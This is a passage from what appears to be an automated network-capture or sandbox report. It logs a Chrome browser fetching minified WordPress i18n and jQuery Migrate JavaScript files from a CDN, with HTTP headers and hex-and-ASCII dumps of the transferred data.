                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 72 6f 70 65 72 74 79 20 22 25 73 22 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 20 22 25 73 22 27 2c 73 2e 6b 65 79 73 5b 6f 5d 2c 73 2e 6b 65 79 73 5b 6f 2d 31 5d 29 29 3b 72 3d 72 5b 73 2e 6b 65 79 73 5b 6f 5d 5d 7d 65 6c 73 65 20 72 3d 73 2e 70 61 72 61 6d 5f 6e 6f 3f 65 5b 73 2e 70 61 72 61 6d 5f 6e 6f 5d 3a 65 5b 64 2b 2b 5d 3b 69 66 28 69 2e 6e 6f 74 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69 2e 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 26 26 28 72 3d 72 28 29 29 2c 69 2e 6e 75 6d 65 72 69 63 5f 61 72 67 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 72 26 26 69 73
                                                                                                                                                                                                                                                        Data Ascii: roperty "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&is
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 65 73 74 28 73 2e 74 79 70 65 29 3f 67 2b 3d 72 3a 28 21 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 7c 7c 63 26 26 21 73 2e 73 69 67 6e 3f 66 3d 22 22 3a 28 66 3d 63 3f 22 2b 22 3a 22 2d 22 2c 72 3d 72 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 69 2e 73 69 67 6e 2c 22 22 29 29 2c 75 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3d 3d 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64 5f 63 68 61 72 2e 63 68 61 72 41 74 28 31 29 3a 22 20 22 2c 70 3d 73 2e 77 69 64 74 68 2d 28 66 2b 72 29 2e 6c 65 6e 67 74 68 2c 6c 3d 73 2e 77 69 64 74 68 26 26 70 3e 30 3f 75 2e 72 65 70 65 61 74 28 70 29 3a 22 22 2c 67 2b 3d 73 2e 61 6c 69 67 6e 3f 66 2b 72 2b 6c 3a 22 30 22 3d 3d 3d 75 3f 66 2b 6c 2b 72 3a 6c 2b 66 2b 72 29
                                                                                                                                                                                                                                                        Data Ascii: est(s.type)?g+=r:(!i.number.test(s.type)||c&&!s.sign?f="":(f=c?"+":"-",r=r.toString().replace(i.sign,"")),u=s.pad_char?"0"===s.pad_char?"0":s.pad_char.charAt(1):" ",p=s.width-(f+r).length,l=s.width&&p>0?u.repeat(p):"",g+=s.align?f+r+l:"0"===u?f+l+r:l+f+r)
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 7b 73 70 72 69 6e 74 66 3a 61 2c 76 73 70 72 69 6e 74 66 3a 6f 7d 7d 2e 63 61 6c 6c 28 65 2c 72 2c 65 2c 74 29 29 7c 7c 28 74 2e 65 78 70 6f 72 74 73 3d 6e 29 29 7d 28 29 7d 7d 2c 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 28 61 2c 61 2e 65 78 70 6f 72 74 73 2c 72 29 2c 61 2e 65 78 70 6f 72 74 73 7d 72 2e 6e 3d 74 3d 3e 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 72 2e 64 28 65 2c 7b 61 3a 65 7d 29 2c 65 7d 2c
                                                                                                                                                                                                                                                        Data Ascii: {sprintf:a,vsprintf:o}}.call(e,r,e,t))||(t.exports=n))}()}},e={};function r(n){var i=e[n];if(void 0!==i)return i.exports;var a=e[n]={exports:{}};return t[n](a,a.exports,r),a.exports}r.n=t=>{var e=t&&t.__esModule?()=>t.default:()=>t;return r.d(e,{a:e}),e},
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6c 6c 2c 69 3d 30 7d 2c 61 7d 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 2e 2e 2e 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2e 73 70 72 69 6e 74 66 28 74 2c 2e 2e 2e 72 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 69 28 22 73 70 72 69 6e 74 66 20 65 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 7d 7d 76 61 72 20 6f 2c 73 2c 6c 2c 75 3b 6f 3d 7b 22 28 22 3a 39 2c 22 21 22 3a 38 2c 22 2a 22 3a 37 2c 22 2f 22 3a 37 2c 22 25 22 3a 37 2c 22 2b 22 3a 36 2c 22 2d 22 3a 36 2c 22 3c 22 3a 35 2c 22 3c 3d 22 3a 35 2c 22 3e 22 3a 35 2c 22 3e 3d 22 3a 35 2c 22 3d 3d 22 3a 34 2c 22 21 3d 22 3a 34 2c 22 26 26 22 3a
                                                                                                                                                                                                                                                        Data Ascii: ll,i=0},a}(console.error);function a(t,...r){try{return e().sprintf(t,...r)}catch(e){return e instanceof Error&&i("sprintf error: \n\n"+e.toString()),t}}var o,s,l,u;o={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6c 2c 69 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 7d 65 6c 73 65 20 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 65 5b 6f 5d 3a 2b 6f 3b 6c 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 6c 5b 30 5d 7d 28 65 2c 74 29 7d 7d 76 61 72 20 66 3d 7b 63 6f 6e 74 65 78 74 44 65 6c 69 6d 69 74 65 72 3a 22 04 22 2c 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 20 69 6e 20 74 68 69 73 2e 64 61 74 61 3d 74 2c 74 68 69 73 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 3d 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 7b 7d 2c 66 29 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 72 5d 3d 76 6f 69 64 20 30 21 3d 3d 65 26 26 72 20 69 6e 20 65 3f 65 5b 72 5d
                                                                                                                                                                                                                                                        Data Ascii: l,i)}catch(t){return t}}else s=e.hasOwnProperty(o)?e[o]:+o;l.push(s)}return l[0]}(e,t)}}var f={contextDelimiter:"",onMissingKey:null};function d(t,e){var r;for(r in this.data=t,this.pluralForms={},this.options={},f)this.options[r]=void 0!==e&&r in e?e[r]
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 65 74 75 72 6e 20 72 3f 28 69 3d 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 22 2c 69 2c 74 2c 65 2c 6e 29 2c 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 5f 22 2b 75 28 6e 29 2c 69 2c 74 2c 65 2c 6e 29 29 3a 69 7d 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 7b 67 2e 74 65 73 74 28 74 29 26 26 61 28 29 7d 3b 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 41 64 64 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 2c 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 7d 72 65 74 75 72 6e
                                                                                                                                                                                                                                                        Data Ascii: eturn r?(i=r.applyFilters("i18n.gettext_with_context",i,t,e,n),r.applyFilters("i18n.gettext_with_context_"+u(n),i,t,e,n)):i};if(t&&s(t,e),r){const t=t=>{g.test(t)&&a()};r.addAction("hookAdded","core/i18n",t),r.addAction("hookRemoved","core/i18n",t)}return
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC180INData Raw: 74 61 2e 62 69 6e 64 28 62 29 2c 6b 3d 62 2e 73 75 62 73 63 72 69 62 65 2e 62 69 6e 64 28 62 29 2c 46 3d 62 2e 5f 5f 2e 62 69 6e 64 28 62 29 2c 53 3d 62 2e 5f 78 2e 62 69 6e 64 28 62 29 2c 6a 3d 62 2e 5f 6e 2e 62 69 6e 64 28 62 29 2c 4c 3d 62 2e 5f 6e 78 2e 62 69 6e 64 28 62 29 2c 54 3d 62 2e 69 73 52 54 4c 2e 62 69 6e 64 28 62 29 2c 44 3d 62 2e 68 61 73 54 72 61 6e 73 6c 61 74 69 6f 6e 2e 62 69 6e 64 28 62 29 7d 29 28 29 2c 28 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 29 2e 69 31 38 6e 3d 6e 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: ta.bind(b),k=b.subscribe.bind(b),F=b.__.bind(b),S=b._x.bind(b),j=b._n.bind(b),L=b._nx.bind(b),T=b.isRTL.bind(b),D=b.hasTranslation.bind(b)})(),(window.wp=window.wp||{}).i18n=n})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        15192.168.2.449767192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC406OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC634INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 13577
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/jquery-migrate.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 09 Jun 2023 05:49:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC735INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                                                                                                                                        Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2e 6d 69 67 72 61 74 65 45 6e 61 62 6c 65 50 61 74 63 68 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 64 65 6c 65 74 65 20 74 5b 61 72 67 75 6d 65 6e 74 73 5b 65 5d 5d 7d 2c 73 2e 6d 69 67 72 61 74 65 49 73 50 61 74 63 68 45 6e 61 62 6c 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 74 5b 65 5d 7d 2c 6e 2e 63 6f 6e 73 6f 6c 65 26 26 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 26 26 28 73 26 26 65 28 22 33 2e 30 2e 30 22 29 26 26 21 65 28 22 35 2e 30 2e 30 22 29 7c 7c 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 6a 51 75 65 72 79 20 33 2e 78 2d 34 2e 78 20 52 45 51 55 49 52 45 44 22 29 2c 73 2e 6d 69 67 72 61
                                                                                                                                                                                                                                                        Data Ascii: .migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migra
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6d 3d 73 2e 66 6e 2e 69 6e 69 74 2c 79 3d 73 2e 66 69 6e 64 2c 68 3d 2f 5c 5b 28 5c 73 2a 5b 2d 5c 77 5d 2b 5c 73 2a 29 28 5b 7e 7c 5e 24 2a 5d 3f 3d 29 5c 73 2a 28 5b 2d 5c 77 23 5d 2a 3f 23 5b 2d 5c 77 23 5d 2a 29 5c 73 2a 5c 5d 2f 2c 67 3d 2f 5c 5b 28 5c 73 2a 5b 2d 5c 77 5d 2b 5c 73 2a 29 28 5b 7e 7c 5e 24 2a 5d 3f 3d 29 5c 73 2a 28 5b 2d 5c 77 23 5d 2a 3f 23 5b 2d 5c 77 23 5d 2a 29 5c 73 2a 5c 5d 2f 67 2c 76 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 28 5b 5e 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 29 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 3b 66 6f 72 28 64 20 69 6e 20 69 28 73 2e 66 6e 2c 22 69 6e 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63
                                                                                                                                                                                                                                                        Data Ascii: m=s.fn.init,y=s.find,h=/\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/,g=/\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/g,v=/^[\s\uFEFF\xA0]+|([^\s\uFEFF\xA0])[\s\uFEFF\xA0]+$/g;for(d in i(s.fn,"init",function(e){var t=Array.prototype.slic
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 75 6e 69 71 75 65 53 6f 72 74 22 29 2c 72 28 73 2e 65 78 70 72 2c 22 66 69 6c 74 65 72 73 22 2c 73 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 22 65 78 70 72 2d 70 72 65 2d 70 73 65 75 64 6f 73 22 2c 22 6a 51 75 65 72 79 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 22 29 2c 72 28 73 2e 65 78 70 72 2c 22 3a 22 2c 73 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 22 65 78 70 72 2d 70 72 65 2d 70 73 65 75 64 6f 73 22 2c 22 6a 51 75 65 72 79 2e 65 78 70 72 5b 27 3a 27 5d 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 22 29 2c 65 28
                                                                                                                                                                                                                                                        Data Ascii: ecated; use jQuery.uniqueSort"),r(s.expr,"filters",s.expr.pseudos,"expr-pre-pseudos","jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"),r(s.expr,":",s.expr.pseudos,"expr-pre-pseudos","jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"),e(
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 61 6a 61 78 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6c 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 65 2e 70 72 6f 6d 69 73 65 26 26 28 63 28 65 2c 22 73 75 63 63 65 73 73 22 2c 65 2e 64 6f 6e 65 2c 22 6a 71 58 48 52 2d 6d 65 74 68 6f 64 73 22 2c 22 6a 51 58 48 52 2e 73 75 63 63 65 73 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 2c 63 28 65 2c 22 65 72 72 6f 72 22 2c 65 2e 66 61 69 6c 2c 22 6a 71 58 48 52 2d 6d 65 74 68 6f 64 73 22 2c 22 6a 51 58 48 52 2e 65 72 72 6f 72 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 2c 63 28 65 2c 22 63 6f 6d 70 6c 65 74 65 22 2c 65 2e 61 6c 77 61 79 73 2c 22 6a 71 58 48 52 2d 6d 65
                                                                                                                                                                                                                                                        Data Ascii: ajax",function(){var e=l.apply(this,arguments);return e.promise&&(c(e,"success",e.done,"jqXHR-methods","jQXHR.success is deprecated and removed"),c(e,"error",e.fail,"jqXHR-methods","jQXHR.error is deprecated and removed"),c(e,"complete",e.always,"jqXHR-me
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 26 26 73 2e 64 61 74 61 28 74 68 69 73 2c 22 5f 5f 63 6c 61 73 73 4e 61 6d 65 5f 5f 22 29 7c 7c 22 22 29 7d 29 29 7d 2c 22 74 6f 67 67 6c 65 43 6c 61 73 73 2d 62 6f 6f 6c 22 29 3b 76 61 72 20 51 2c 41 2c 52 3d 21 31 2c 43 3d 2f 5e 5b 61 2d 7a 5d 2f 2c 4e 3d 2f 5e 28 3f 3a 42 6f 72 64 65 72 28 3f 3a 54 6f 70 7c 52 69 67 68 74 7c 42 6f 74 74 6f 6d 7c 4c 65 66 74 29 3f 28 3f 3a 57 69 64 74 68 7c 29 7c 28 3f 3a 4d 61 72 67 69 6e 7c 50 61 64 64 69 6e 67 29 3f 28 3f 3a 54 6f 70 7c 52 69 67 68 74 7c 42 6f 74 74 6f 6d 7c 4c 65 66 74 29 3f 7c 28 3f 3a 4d 69 6e 7c 4d 61 78 29 3f 28 3f 3a 57 69 64 74 68 7c 48 65 69 67 68 74 29 29 24 2f 3b 73 2e 73 77 61 70 26 26 73 2e 65 61 63 68 28 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 2c 22 72 65 6c 69 61 62 6c 65
                                                                                                                                                                                                                                                        Data Ascii: t&&s.data(this,"__className__")||"")}))},"toggleClass-bool");var Q,A,R=!1,C=/^[a-z]/,N=/^(?:Border(?:Top|Right|Bottom|Left)?(?:Width|)|(?:Margin|Padding)?(?:Top|Right|Bottom|Left)?|(?:Min|Max)?(?:Width|Height))$/;s.swap&&s.each(["height","width","reliable
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 29 3a 41 3d 73 2e 63 73 73 4e 75 6d 62 65 72 2c 51 3d 73 2e 66 6e 2e 63 73 73 2c 69 28 73 2e 66 6e 2c 22 63 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 28 73 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 2e 63 73 73 2e 63 61 6c 6c 28 6f 2c 65 2c 74 29 7d 29 2c 74 68 69 73 29 3a 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 72 3d 78 28 65 29 2c 6e 3d 72 2c 43 2e 74 65 73 74 28 6e 29 26 26 4e 2e 74 65 73 74 28 6e 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 6e 2e 73 6c 69 63 65 28 31 29 29 7c 7c 41 5b
                                                                                                                                                                                                                                                        Data Ascii: ):A=s.cssNumber,Q=s.fn.css,i(s.fn,"css",function(e,t){var r,n,o=this;return e&&"object"==typeof e&&!Array.isArray(e)?(s.each(e,function(e,t){s.fn.css.call(o,e,t)}),this):("number"==typeof t&&(r=x(e),n=r,C.test(n)&&N.test(n[0].toUpperCase()+n.slice(1))||A[
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6d 65 6e 74 2e 68 69 64 64 65 6e 7c 7c 75 28 22 66 78 2d 69 6e 74 65 72 76 61 6c 22 2c 50 29 2c 73 2e 6d 69 67 72 61 74 65 49 73 50 61 74 63 68 45 6e 61 62 6c 65 64 28 22 66 78 2d 69 6e 74 65 72 76 61 6c 22 29 26 26 76 6f 69 64 20 30 3d 3d 3d 53 3f 31 33 3a 53 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 75 28 22 66 78 2d 69 6e 74 65 72 76 61 6c 22 2c 50 29 2c 53 3d 65 7d 7d 29 29 3b 76 61 72 20 4d 3d 73 2e 66 6e 2e 6c 6f 61 64 2c 71 3d 73 2e 65 76 65 6e 74 2e 61 64 64 2c 4f 3d 73 2e 65 76 65 6e 74 2e 66 69 78 3b 73 2e 65 76 65 6e 74 2e 70 72 6f 70 73 3d 5b 5d 2c 73 2e 65 76 65 6e 74 2e 66 69 78 48 6f 6f 6b 73 3d 7b 7d 2c 72 28 73 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2c 22 63 6f 6e 63 61 74 22 2c 73 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2e 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: ment.hidden||u("fx-interval",P),s.migrateIsPatchEnabled("fx-interval")&&void 0===S?13:S},set:function(e){u("fx-interval",P),S=e}}));var M=s.fn.load,q=s.event.add,O=s.event.fix;s.event.props=[],s.event.fixHooks={},r(s.event.props,"concat",s.event.props.con
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 29 2c 73 2e 65 61 63 68 28 22 62 6c 75 72 20 66 6f 63 75 73 20 66 6f 63 75 73 69 6e 20 66 6f 63 75 73 6f 75 74 20 72 65 73 69 7a 65 20 73 63 72 6f 6c 6c 20 63 6c 69 63 6b 20 64 62 6c 63 6c 69 63 6b 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 6d 6f 75 73 65 6d 6f 76 65 20 6d 6f 75 73 65 6f 76 65 72 20 6d 6f 75 73 65 6f 75 74 20 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 20 63 68 61 6e 67 65 20 73 65 6c 65 63 74 20 73 75 62 6d 69 74 20 6b 65 79 64 6f 77 6e 20 6b 65 79 70 72 65 73 73 20 6b 65 79 75 70 20 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 63 28 73 2e 66 6e 2c 72 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 30 3c 61 72 67 75 6d
                                                                                                                                                                                                                                                        Data Ascii: ),s.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,r){c(s.fn,r,function(e,t){return 0<argum
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 32 30 5c 74 5c 72 5c 6e 5c 66 5d 2a 29 5b 5e 3e 5d 2a 29 5c 2f 3e 2f 67 69 3b 73 2e 55 4e 53 41 46 45 5f 72 65 73 74 6f 72 65 4c 65 67 61 63 79 48 74 6d 6c 50 72 65 66 69 6c 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 6d 69 67 72 61 74 65 45 6e 61 62 6c 65 50 61 74 63 68 65 73 28 22 73 65 6c 66 2d 63 6c 6f 73 65 64 2d 74 61 67 73 22 29 7d 2c 69 28 73 2c 22 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3b 72 65 74 75 72 6e 28 72 3d 28 74 3d 65 29 2e 72 65 70 6c 61 63 65 28 46 2c 22 3c 24 31 3e 3c 2f 24 32 3e 22 29 29 21 3d 3d 74 26 26 54 28 74 29 21 3d 3d 54 28 72 29 26 26 75 28 22 73 65 6c 66 2d 63 6c 6f 73 65 64 2d 74 61 67 73 22 2c 22 48 54 4d 4c 20 74 61 67 73 20 6d 75 73 74 20 62 65 20 70
                                                                                                                                                                                                                                                        Data Ascii: 20\t\r\n\f]*)[^>]*)\/>/gi;s.UNSAFE_restoreLegacyHtmlPrefilter=function(){s.migrateEnablePatches("self-closed-tags")},i(s,"htmlPrefilter",function(e){var t,r;return(r=(t=e).replace(F,"<$1></$2>"))!==t&&T(t)!==T(r)&&u("self-closed-tags","HTML tags must be p


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        16192.168.2.449775192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
